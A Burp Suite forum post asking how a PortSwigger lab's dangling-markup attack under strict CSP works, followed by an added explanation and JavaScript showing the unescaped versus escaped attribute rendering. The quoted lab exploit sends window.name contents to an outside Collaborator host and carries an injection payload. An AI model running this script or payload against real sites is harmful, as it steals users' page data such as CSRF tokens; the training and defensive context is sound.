Burp Suite User Forum


Code explanation for Lab: Reflected XSS protected by very strict CSP, with dangling markup attack

Dom | Last updated: Apr 08, 2021 11:00AM UTC

Hi, I have got a quick question about the solution of the lab mentioned in the subject. I understand the context and the approach, and I have come pretty close to the solution myself, but I just could not make it work. The base tag sets the target for the a tag (actually for all a tags except the ones that overwrite it), but the target attribute must also set the window.name for the exploit to work! Is this always true? I could not verify this with my tests, and I didn't find an answer when searching for it.

<script>
if(window.name) {
    new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
} else {
    location = 'https://your-lab-id.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://your-exploit-server-id.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>

TL;DR: My guess at what is happening. When the victim visits the malicious site, window.name is not set (else case), so the victim is redirected to the vulnerable site and is presented with a "Click me" button. If he clicks it, he is redirected back to the malicious site, and this time window.name is set by the target attribute (?!). The value of window.name now contains the information exfiltrated through the dangling injection. Thanks in advance!
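The lab exists because the reflected email value is written into an HTML attribute without escaping, so a payload containing `">` closes the attribute and the element and lets the rest of the page be swallowed by an unterminated `<base target='`. A strict CSP does not help here, since no injected script runs; the fix is output encoding. The following is an added example, not code from the forum post or from the PortSwigger lab, that places the vulnerable rendering next to the hardened one and counts which tags actually come out. The exploit-server hostname from the post is replaced with a placeholder.

```javascript
// Added example (not from the forum post or the PortSwigger lab): shows the
// server-side bug class behind the lab, reflecting a query value into an HTML
// attribute without escaping, next to the fixed version, plus a small check
// that detects the element break-out.

// Escape the five characters that matter inside an HTML attribute or text node.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: the value is concatenated straight into the attribute, so a
// leading `">` terminates the input element and anything after it is markup.
function renderAccountFormUnsafe(email) {
  return `<input type="text" name="email" value="${email}">`;
}

// Hardened: attribute-escape before interpolation (a templating engine with
// contextual auto-escaping does the same thing for you).
function renderAccountFormSafe(email) {
  return `<input type="text" name="email" value="${escapeHtml(email)}">`;
}

// Naive tokenizer for the demo: a '<' followed by a letter starts a tag.
// Escaped input produces '&lt;' instead, which never matches.
function tagNames(html) {
  return [...html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)/g)].map(m => m[1].toLowerCase());
}

// Constructed input: the decoded form of the payload quoted in the post, with
// the exploit-server host replaced by an obvious placeholder.
const DANGLING_PAYLOAD =
  '"><a href="https://EXPLOIT-SERVER-PLACEHOLDER/exploit">Click me</a><base target=\'';

// Render both variants and report which elements the browser would see.
function demo(payload = DANGLING_PAYLOAD) {
  return {
    unsafeTags: tagNames(renderAccountFormUnsafe(payload)),
    safeTags: tagNames(renderAccountFormSafe(payload)),
  };
}

console.log(demo());
```

In the unsafe rendering the parser sees three elements (`input`, `a`, `base`), and the unclosed `target='` attribute of the `base` element keeps consuming the page until the next single quote; in the safe rendering only the `input` element exists and the payload is inert text inside its value. The window.name behaviour the post asks about is standard: following a link whose (inherited) target names a browsing context that does not yet exist creates a new one with that name, so whatever the dangling attribute captured becomes the new window's name.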
